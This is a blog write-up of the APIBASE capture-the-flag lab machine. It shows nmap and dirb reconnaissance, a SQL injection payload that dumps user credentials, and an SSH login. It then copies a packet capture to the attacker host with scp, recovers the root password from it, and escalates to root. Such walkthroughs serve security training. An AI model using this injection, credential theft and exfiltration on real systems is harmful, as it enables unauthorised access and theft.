APIBASE MACHINE

 APIBASE 

 
┌──(root㉿kali)-[/home/kali/Descargas]
└─# bash auto_deploy.sh apibase.tar 

                            ##        .         
                      ## ## ##       ==         
                   ## ## ## ##      ===         
               /""""""""""""""""\___/ ===       
          ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
               \______ o          __/           
                 \    \        __/            
                  \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____ 
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___]                                      

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

First of all, we have to execute ping and see the connection between attacker machine and vulnerable machine as you can see below.
┌──(root㉿kali)-[/home/kali/Descargas]
└─# ping -c3 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.066 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.067 ms

--- 172.17.0.2 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2039ms
rtt min/avg/max/mdev = 0.066/0.066/0.067/0.000 ms

Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 22 (HTTP) and 500 were open.
┌──(root㉿kali)-[/home/kali/Descargas]
└─# nmap -n -Pn -sS -sV -vvv 172.17.0.2 2>/dev/null 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-19 13:30 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 13:30
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 13:30, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:30
Scanning 172.17.0.2 [1000 ports]
Discovered open port 22/tcp on 172.17.0.2
Discovered open port 5000/tcp on 172.17.0.2
Completed SYN Stealth Scan at 13:30, 0.04s elapsed (1000 total ports)
Initiating Service scan at 13:30
Scanning 2 services on 172.17.0.2
Completed Service scan at 13:30, 6.03s elapsed (2 services on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:30
Completed NSE at 13:30, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:30
Completed NSE at 13:30, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000080s latency).
Scanned at 2026-03-19 13:30:22 CET for 7s
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u4 (protocol 2.0)
5000/tcp open  http    syn-ack ttl 64 Werkzeug httpd 1.0.1 (Python 3.9.2)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
           Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.036KB)
  
Now, let's go to write in URL this IP Address http://172.17.0.2:5000 as you can see below.
But the the picture shows "Please use /add to add  a user or /users to query users"
 
Now, we are going to trying introduce /users in the url but it has been invalid parameter because normally we have to introduce /users and the users, and as we don't know the path and the users we can try use fuzzing web as you can see below.
  
                                                                
Now, let's go to scanning with dirb toolkit to get the information in this webpage as you can see below.
┌──(root㉿kali)-[/home/kali/Descargas]
└─# dirb "http://172.17.0.2:5000/users?"

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Mar 19 13:35:42 2026
URL_BASE: http://172.17.0.2:5000/users?
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.17.0.2:5000/users? ----
+ http://172.17.0.2:5000/users?username (CODE:200|SIZE:39)                                   
                                                                                             
-----------------
END_TIME: Thu Mar 19 13:35:50 2026
DOWNLOADED: 4612 - FOUND: 1
 
Gotha! we have discovered the key which is  username as you can see below but the next problem is we don't know the users.
 
 
In addition, we have got obtain more information as that there is a  sql database as you can see below.
 Now, we are trying use a sql injection  as you can see below "http://172.17.0.2:5000/users?username=prueba ' or 1=1 -- -".
 
Gotha! the users has been found out which are:
  •  pingu (user): pinguinasio(password)

As we knowledge there is a ssh port let´s go to introduce the credentials as you can see below.
┌──(root㉿kali)-[/home/kali/Descargas]
└─# ssh pingu@172.17.0.2                                  
The authenticity of host '172.17.0.2 (172.17.0.2)' can't be established.
ED25519 key fingerprint is SHA256:UQP3sZ2M9Bu7kTQ1HO4SYadbMon/LNV+DBfYj4vF3vk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.2' (ED25519) to the list of known hosts.
pingu@172.17.0.2's password: 
Linux 2f1607828f01 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
 
Yes we have hacked the sistem and now let's go to begin root user with the following steps:
  1. sudo -l (to see if there is a path to hack) but it hasn´t been possible  
  2. cd ..  (to change directory and discover new files, paths etc, and the new discover paths has been:
    1. app.py
    2. network.pacap
    3. pingu
    4. users.db 
pingu@2f1607828f01:~$ sudo -l
-bash: sudo: command not found 
pingu@2f1607828f01:~$ cd ..
pingu@2f1607828f01:/home$ ls
app.py  network.pcap  pingu  users.db

pingu@2f1607828f01:~$ cd ..
pingu@2f1607828f01:/home$ ls
app.py  network.pcap  pingu  users.db
 
Now, we can view the users.db file but we haven't discovered nothing as you can see below. 
pingu@2f1607828f01:/home$ cat users.db 
��q�AtableusersusersCREATE TABLE users
��#pingupinguinasiopingu@2f1607828f01:/home$ ^Came TEXT, password TEXT)

In the attack machine we have to start ssh service to share network.pcap  and see if it's possible obtain a password in plaintext with this command as you can see below.

┌──(root㉿kali)-[/home/kali/Descargas]
└─# systemctl start ssh.service
                                                                                                               
┌──(root㉿kali)-[/home/kali/Descargas]
└─# systemctl status ssh.service 
● ssh.service - OpenBSD Secure Shell server
     Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: disabled)
     Active: active (running) since Thu 2026-03-19 13:46:33 CET; 3s ago
 Invocation: 6dd6fe8b99dd481d89b87574f0ea18b9
       Docs: man:sshd(8)
             man:sshd_config(5)
    Process: 45953 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
   Main PID: 45955 (sshd)
      Tasks: 1 (limit: 12711)
     Memory: 2.4M (peak: 3M)
        CPU: 32ms
     CGroup: /system.slice/ssh.service
             └─45955 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"

mar 19 13:46:33 kali systemd[1]: Starting ssh.service - OpenBSD Secure Shell server...
mar 19 13:46:33 kali sshd[45955]: Server listening on 0.0.0.0 port 22.
mar 19 13:46:33 kali sshd[45955]: Server listening on :: port 22.
mar 19 13:46:33 kali systemd[1]: Started ssh.service - OpenBSD Secure Shell server.

Now, we are going to sharing the file as you can see below.
pingu@2f1607828f01:/home$ scp network.pcap kali@192.168.88.5:/home/kali
The authenticity of host '192.168.88.5 (192.168.88.5)' can't be established.
ECDSA key fingerprint is SHA256:Sdw1IM59LaYzLtsf7+/EA7q3NygFUZ5cNYyQK0lHnKs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.5' (ECDSA) to the list of known hosts.
kali@192.168.88.5's password: 
Permission denied, please try again.
kali@192.168.88.5's password: 
network.pcap                                                100%  399   503.7KB/s   00:00   
 
We can see below the file has been shared successfully.
┌──(root㉿kali)-[/home/kali]
└─# ls
api.py     Documentos  Imágenes  network.pcap  Público   Vídeos
Descargas  Escritorio  Música    Plantillas    race.txt
 
Moreover, we have to open wireshark to see network.pcap as you can see below.


 
 
 
 Gotha! we have found out the password in plaintext which is balulero as you can see below.
 
 
 But we can see the password with the cat command too as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# cat network.pcap 
���&�gVF((E(@"���P .�&�g@G((E(@O��P [�&�g�G((E(@"���P .�&�g3H33E3@"���P aRLOGIN root
&�g
   I66E6@"���P ��PASS balulero
&�g�I66E6@O��P ��Access Denied

If we write su root and the password balulero, we will be able to be user root as you can see below.
pingu@2f1607828f01:/home$ su root
Password: 
root@2f1607828f01:/home# whoami
root
 
Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

Blue Print

Image
BLUEPRINT I’m going to do the resolution of Easy Level from Tryhackme called Blueprint which is so easy to do. Firstly; we have to open a new Shell terminal in our virtual machine and we have to execute this command you can see in the picture below which we'll be able to do the port scans. In addition, as we know the open ports we’re going to use this param  -A ( user scripts from Nmap to look at vulnerabilities)  and  sV  which it will give if it’s possible versions in each ports you want to analyze in the four pictures you can observe below. In addition, as we know the open ports we’re going to use this param  -A ( user scripts from Nmap to look at vulnerabilities)  and  sV  which it will give if it’s possible versions in each ports you want to analyze in the four pictures you can observe below. Now as I´ve verify in the 80 port when I introduce IP Address from victim machine I get it a mistake. But 8080 port in the screenshots the nmap script...
Read more »